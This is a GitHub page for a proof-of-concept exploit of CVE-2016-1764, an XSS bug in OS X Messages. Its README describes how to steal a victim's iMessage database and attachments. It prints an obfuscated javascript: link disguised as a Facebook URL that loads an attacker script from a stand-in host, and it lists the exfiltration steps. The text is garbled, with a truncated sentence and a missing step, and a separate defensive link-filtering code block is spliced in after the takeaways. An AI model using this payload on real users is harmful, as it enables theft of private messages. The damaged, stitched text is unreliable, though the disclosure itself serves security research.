https://github.com/moloch--/cve-2016-1764
Extraction of iMessage Data via XSS
- Host: GitHub
- URL: https://github.com/moloch--/cve-2016-1764
- Owner: moloch--
- Created: 2016-04-08T15:45:44.000Z (about 10 years ago)
- Default Branch: master
- Last Pushed: 2016-04-08T23:00:58.000Z (about 10 years ago)
- Last Synced: 2025-04-14T02:48:44.062Z (about 1 year ago)
- Topics: cve, exploit, imessage, security, vulnerability, xss
- Language: JavaScript
- Size: 380 KB
- Stars: 53
- Watchers: 3
- Forks: 37
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# PoC Exploit Code for CVE-2016-1764
### Recovery of Plaintext iMessage Data Without Breaking Crypto

### Authors
* [Shubham Shah](https://shubh.am/) from [Bishop Fox](http://bishopfox.com/)
* [Joe DeMesy](https://github.com/moloch--) from [Bishop Fox](http://bishopfox.com/)
* [Matthew Bryant](https://thehackerblog.com/)
## CVE-2016-1764
* **Vendor:** Apple
* **Release Date:** April 8, 2016
* **Patch Date:** March 21, 2016
* **Systems Affected:** Messages on OSX Mountain Yosemite, El Capitan
While the majority of recent debate around Apple has been focused on cryptography, the industry and law enforcement seem to have forgotten that simpler, application-level vulnerabilities can be leveraged to forgo encryption altogether. CVE-2016-1764, which was fixed by Apple in March of 2016, is an application-layer bug that results in the remote disclosure of all message content and attachments in plaintext by exploiting the OS X iMessage client. Moreover, you do not need a graduate degree in mathematics to exploit it, nor does it require detailed knowledge of memory management, shellcode, or intricate ASLR-bypass ROP chains. In fact, it is a relatively simple bug that can be exploited by anyone with a basic knowledge of JavaScript.
## Technical TL;DR
Messages (iMessage) for OS X from Apple implements its user interface using an embedded version of WebKit; furthermore, Messages on OS X will render any URI as a clickable HTML `/Library/Messages/*`
The textual content of these messages and other metadata are stored within a SQLite database located at:
`/Users//Library/Messages/chat.db`
This database also contains the locations for all of the attachments that are located on a user's machine.
In order to steal this database, and subsequently all of the attachments ever received or sent by a victim, a more advanced attack payload is needed.
### Exploit Overview
The following steps need to be carried out before the data can be successfully exfiltrated by an attacker:
1. Gain initial JavaScript execution in the application DOM
2. Obtain the current user (again, `~` cannot be used)
4. Using the username, generate the full path to the `chat.db` file, i.e. `/Users/ExampleUser/Library/Messages/chat.db`
5. Use `XMLHttpRequest` to read the `chat.db` database and query it for the attachments' file paths
6. Upload the database and all attachments using `XMLHttpRequest`, or WebSockets if you want real-time access.
We can determine the currently logged-in user by requesting, and subsequently parsing, `/Library/Preferences/com.apple.loginwindow.plist`; this file is conveniently readable from within the OS X application sandbox. From here it is trivial to construct the full path to the user's `chat.db`.
Once the database file has been successfully exfiltrated, it can be passed to a custom server-side script which extracts the full paths of the attachments sent and received by the victim, found within the `attachments` table in the database.
These full paths are retrieved by the malicious JavaScript payload and then are used to exfiltrate the attachment files from the victim's machine via `XMLHttpRequest`.
Next the attacker applies a little obfuscation to make the URL more believable:
```
javascript://www.facebook.com/photo.php?fbid=111789595853599&set=a.111055039260388.1073741826.100010676767694&type=3&theater%0A%28function%28s%29%7Bs.src%3D%27http%3A%2f%2fyourhostname%3A8888%2ff%2fpayload.js%27%3Bdocument.body.appendChild%28s%29%7D%29%28document.createElement%28%27script%27%29%29
```
If the victim clicks the above URI in the Messages for OS X application, the victim's entire chat history and all associated attachments are sent to the attacker.
## Takeaways
_JavaScript is Everywhere_
Web application security flaws are no longer limited to the browser; they have found their way into native applications too. While it can be productive for developers to use web technologies such as [WebKit](https://webkit.org/), or its far more dangerous kin [nw.js](http://nwjs.io/), to build desktop applications, web application security best practices must still be followed.
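As an added example (not code from this repository or from Apple), this is the kind of scheme allow-list an application that auto-links untrusted message text needs before it renders a URI as clickable: it refuses the `javascript:` scheme even when dressed up as `javascript://www.facebook.com/...` with an encoded newline, and HTML-escapes every token so rejected URIs stay inert text. The function and constant names (`extractScheme`, `isSafeLink`, `linkifyUntrusted`, `ALLOWED_SCHEMES`) and the sample inputs are assumptions made for the example.

```javascript
// Added example: scheme allow-listing for auto-linked text in a WebKit-hosted UI.
// Names are assumed for illustration; this is not the CVE-2016-1764 repo's code.

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Return the lowercase scheme of `raw`, or null if it has none. Mirrors how URL
// parsers treat scheme text: leading/trailing C0 controls and spaces are trimmed,
// embedded tab/CR/LF are dropped, and case is ignored, so "\tJaVa\nScRiPt:" still
// resolves to "javascript" rather than slipping past a naive string compare.
function extractScheme(raw) {
  let s = String(raw).replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
  s = s.replace(/[\t\r\n]/g, "");
  const m = /^([A-Za-z][A-Za-z0-9+.\-]*):/.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// Only allow-listed schemes may become clickable. "javascript://host/path" still
// has scheme "javascript": the "//host" part is decoy, not a web origin.
function isSafeLink(raw) {
  const scheme = extractScheme(raw);
  return scheme !== null && ALLOWED_SCHEMES.has(scheme);
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Render untrusted text: every whitespace-delimited token is HTML-escaped, and only
// tokens that pass isSafeLink are wrapped in an anchor. The capture group in the
// split keeps the original whitespace so the output reads like the input.
function linkifyUntrusted(text) {
  return String(text).split(/(\s+)/).map((tok) => {
    const safe = escapeHtml(tok);
    return isSafeLink(tok)
      ? `<a href="${safe}" rel="noopener noreferrer">${safe}</a>`
      : safe;
  }).join("");
}

// Constructed samples: a javascript: URI shaped like the README's obfuscated link
// (plausible path, then an encoded newline) and the genuine https: URL it mimics.
const PAYLOAD = "javascript://www.facebook.com/photo.php?fbid=1%0Aalert(1)";
const DECOY = "https://www.facebook.com/photo.php?fbid=111789595853599";

console.log(linkifyUntrusted(`see ${PAYLOAD} and ${DECOY}`));
```

The rejected URI is still visible to the user as plain text; only the decoy `https:` link becomes an anchor.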